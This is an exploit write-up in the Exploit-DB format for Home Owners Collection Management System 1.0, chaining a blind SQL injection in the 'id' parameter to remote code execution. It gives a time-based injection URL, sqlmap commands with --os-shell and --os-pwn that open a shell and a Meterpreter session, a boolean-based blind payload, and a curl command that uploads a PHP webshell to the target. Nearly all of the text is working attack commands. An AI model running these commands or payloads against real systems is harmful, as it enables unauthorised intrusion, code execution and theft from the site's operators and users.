# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (Blind SQLi to RCE)
# Date: 9/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 

# Steps
# 1.- Go to : http://192.168.56.1/cwms/?p=blogs/view_blog&id=3
# 2 -  manual inject Blind SQli http://192.168.56.1/cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell 
# 5 - Web Shell to meterpreter full tty shell



# Blind sqli to Rce
#Exploit   
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-shell  --eta  --hex --dbms=mysql --technique=b 

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hOiz
---

# ubload meterpreter metasploit 
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-pwn  --eta  --hex --dbms=mysql --technique=b 
or
curl -v  -F "filename=@0day_hejap.php" http://192.168.56.1/tmpukpcj.php 
 

# Proof and Exploit:
https://streamable.com/f07cug